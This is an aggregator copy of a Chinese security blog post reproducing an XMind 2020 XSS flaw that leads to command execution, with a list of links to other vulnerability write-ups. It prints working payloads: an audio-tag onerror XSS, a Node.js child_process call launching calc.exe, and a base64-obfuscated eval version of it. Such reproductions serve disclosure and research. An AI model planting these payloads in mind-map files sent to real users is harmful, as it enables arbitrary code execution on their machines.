6

Xmind 2020 XSS漏洞导致命令执行复现

 3 years ago
source link: https://xz.aliyun.com/t/9559
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Xmind 2020 XSS漏洞导致命令执行复现

Xmind 2020 XSS漏洞导致命令执行复现

今天看到某数字云漏洞预警,但没给利用代码就.....于是跑去复现一下
XMind 是一个全功能的思维导图和头脑风暴软件,为激发灵感和创意而生。作为一款有效提升工作和生活效率的生产力工具,受到全球百千万用户的青睐。
下载地址:https://www.xmind.cn/
下载xmind2020最新版本

一、Xss:
1、利用过程:
主题插入xss利用代码

在大纲页面触发

实现弹窗

2、利用代码:

<audio src=x onerror=confirm("casrc")>

二、命令执行:
1、利用过程:
主题插入命令执行利用代码

在大纲页面触发实现命令执行

触发弹出计算器

2、利用代码:

通过nodejs调用执行系统命令打开计算器
require('child_process').exec('calc.exe',(error, stdout, stderr)=>{alert(stdout: ${stdout});});

<audio src=http://a onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+e2FsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApO30pOw==`,`base64`).toString())'>

三、评价
实现过程简单,用户范围庞大(看了下实验室小伙伴电脑基本都有),危害严重(替换利用代码可实现cs上线等功能)。谨防钓鱼攻击。复现完毕~

点击收藏 | 1 关注 | 1

report

Recommend

  • 32
    • www.freebuf.com 4 years ago
    • Cache

    ExchangeServer漏洞CVE-2020-0688复现

    近期爆出Exchange邮件服务器远程执行命令漏洞,对其进行了分析并在本地进行了复现,其中也遇到了一些问题。 漏洞原理 漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随...

  • 21
    • www.freebuf.com 3 years ago
    • Cache

    CVE-2020-7471漏洞复现及浅析

    一、CVE-2020-7471介绍 2020年2月3日,Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞(CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAg...

  • 9
    • ama2in9.top 3 years ago
    • Cache

    CVE-2020-14364 Qemu越界读写漏洞复现与分析

    CVE-2020-14364 Qemu越界读写漏洞复现与分析该漏洞是长亭的师傅发现的,被称为是qemu历史上最严重的漏洞,本篇文章旨在复现该漏洞,理解漏洞产生原因及利用链,最终达成逃逸,由于涉及到的东西太多,不能和以前一样把所有东西都弄好再总结成博客,打算...

  • 7
    • www.freebuf.com 3 years ago
    • Cache

    SharePoint 2019 XSS漏洞CVE-2020-1456复现

    写在前面的话 在这篇文章中,我们将分析SharePoint 2019中的一个安全漏洞。虽然这个漏洞不是一个典型的JavaScript XSS,但微软还是把...

  • 9
    • ama2in9.top 3 years ago
    • Cache

    CVE-2020-0796 windows SMB 内核提权漏洞复现与分析

    CVE-2020-0796 windows SMB 内核提权漏洞复现与分析 Posted on ...

  • 8
    • ldqk.org 3 years ago
    • Cache

    XMind ZEN 2020 v11beta1学习版(Windows+Mac+Linux)

    XMind ZEN 2020 v11beta1学习版(Windows+Mac+Linux)_懒得勤快的博客_互联网分享精神 首页 文章列表...

  • 7
    • feizhaojun.com 3 years ago
    • Cache

    Xmind 2020 for Mac 10.3.0破解版

    Xmind 2020 for Mac 10.3.0破解版 分类: 软件 Software作者: mukti  时间: 2021-04-13 12:53:42 (星期二) ...

  • 7
    • masuit.com 2 years ago
    • Cache

    XMind ZEN 2020 v11.1正式版学习版(Windows+Mac+Linux)

    XMind ZEN 2020 v11.1正式版学习版(Windows+Mac+Linux)_懒得勤快的博客_互联网分享精神 首页 文章列表...

  • 14
    • blog.csdn.net 2 years ago
    • Cache

    向日葵命令执行漏洞复现

    0x01 漏洞简介 向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。 上海贝锐信息科技股份有限公司向日葵的简约版和个人版for Windows存在命令执行漏洞,攻击者可利用该...

  • 4
    • 827607240.github.io 2 years ago
    • Cache

    Windows TCP/IP远程代码执行复现(CVE-2020-16898)

    Windows TCP/IP远程代码执行复现(CVE-2020-16898)Microsoft Windows TCP/IP是美国微软(Microsoft)公司的一个Windows的Tcp/Ip支持服务。Windows TCP/IP存在远程代码执行漏洞。该漏洞源于程序未对ICMPv6路由器广告数据包进行正确处理。攻击者可...

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK